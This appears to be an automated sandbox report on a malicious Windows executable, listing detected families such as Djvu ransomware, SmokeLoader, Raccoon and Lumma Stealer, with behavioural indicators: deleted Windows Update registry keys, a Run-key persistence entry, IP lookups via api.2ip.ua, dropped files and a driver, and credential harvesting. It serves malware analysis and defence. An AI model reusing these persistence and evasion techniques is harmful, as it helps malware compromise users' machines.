Analysis Overview
SHA256
f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6
Threat Level: Known bad
The file f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6 was found to be: Known bad.
Malicious Activity Summary
Vidar
Djvu Ransomware
Modifies security service
Detected Djvu ransomware
SmokeLoader
Amadey
Raccoon
Lumma Stealer
Suspicious use of NtCreateUserProcessOtherParentProcess
Blocklisted process makes network request
Downloads MZ/PE file
Stops running service(s)
Deletes itself
Executes dropped EXE
Modifies file permissions
Reads user/profile data of web browsers
VMProtect packed file
Loads dropped DLL
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
Creates scheduled task(s)
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-04-25 14:32
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-04-25 14:32
Reported
2023-04-25 14:35
Platform
win10-20230220-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
Amadey
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Lumma Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
Raccoon
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
Vidar
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\918.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\918.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a5948247-5087-4f02-b4b2-8e34b6a1d297\\2B4C.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\2B4C.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Notepad\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Notepad\Chrome\updater.exe | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\4F90.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\11B6.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\2967.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\11B6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\2967.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\2967.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\4F90.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\4F90.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\11B6.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\918.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\918.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\11B6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2967.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4F90.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\54B2.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\D415.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oldplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6.exe
"C:\Users\Admin\AppData\Local\Temp\f58b5ec4d85fc3b3c6ea4f5325c703c1f5e0c3a5cb2710426bf3bd7eb02ec9d6.exe"
C:\Users\Admin\AppData\Local\Temp\918.exe
C:\Users\Admin\AppData\Local\Temp\918.exe
C:\Users\Admin\AppData\Local\Temp\A71.exe
C:\Users\Admin\AppData\Local\Temp\A71.exe
C:\Users\Admin\AppData\Local\Temp\B9B.exe
C:\Users\Admin\AppData\Local\Temp\B9B.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\11B6.exe
C:\Users\Admin\AppData\Local\Temp\11B6.exe
C:\Users\Admin\AppData\Local\Temp\26F5.exe
C:\Users\Admin\AppData\Local\Temp\26F5.exe
